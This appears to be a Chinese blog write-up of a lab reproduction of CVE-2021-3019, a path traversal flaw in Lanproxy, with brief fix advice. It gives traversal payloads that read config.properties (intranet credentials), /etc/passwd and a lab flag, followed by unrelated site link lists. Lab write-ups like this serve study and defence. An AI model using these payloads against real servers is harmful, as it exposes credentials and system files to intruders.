[文件读取]lanproxy 文件读取 (CVE-2021-3019)

wj333332023-11-14 23:10

1.1漏洞描述

|------|---------------|
| 漏洞编号 | CVE-2021-3019 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐ |
| 漏洞环境 | VULFOCUS |
| 攻击方式 | |

描述: Lanproxy 路径遍历漏洞通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

1.2漏洞等级

高危

1.3影响版本

Lanproxy

1.4漏洞复现

1.4.1.基础环境

|----|-----------|
| 靶场 | VULFOCUS |
| 工具 | BurpSuite |
| | |

1.4.2.前提

  • 网站后台地址:

  • 后台管理账密:

  • 后台登录地址 :

1.5深度利用

1.5.1漏洞点

/../conf/config.properties

查看内部网连接的凭据

查看/etc/passwd

../../../../../etc/passwd

查看tmp/flag

../../../../../tmp/flag

拿到flag

flag-{bmh909dda7b-bfc7-464d-97ee-0c81c36001b2}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级
  • 打补丁
  • 上设备
相关推荐
李白你好7 小时前
日常运营提升效率 | 快速检索漏洞名称、问题描述、风险分析以及安全建议
安全
Matana1118 小时前
Vmware中主机ip a没有ip地址
服务器·网络·tcp/ip
久违 °9 小时前
【安全开发】Nuclei源码分析-任务执行流程(三)
安全·网络安全·go
white-persist9 小时前
汇编代码详细解释:汇编语言如何转化为对应的C语言,怎么转化为对应的C代码?
java·c语言·前端·网络·汇编·安全·网络安全
2501_938810119 小时前
共享IP的定义
服务器·网络·tcp/ip
kblj555510 小时前
学习Linux——网络基础管理
linux·网络·学习
爱吃汽的小橘10 小时前
MIPI DSI和MIPI Tx IP 的建立
网络·网络协议·tcp/ip
newxtc10 小时前
【辽宁政务服务网-注册_登录安全分析报告】
运维·selenium·安全·政务·安全爆破
蜗牛^^O^10 小时前
OSI七层模型与TCP/IP 四层模型
网络·网络协议·tcp/ip
wrangler_csdn11 小时前
如何一键将 PDF 转为 Word?
人工智能·安全·ai
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件04Linux下V2Ray安装配置指南05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06npm使用国内淘宝镜像的方法07BongoCat - 跨平台键盘猫动画工具08《大数据技术原理与应用》实验报告三 熟悉HBase常用操作09NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南10jdk21下载、安装(Windows、Linux、macOS)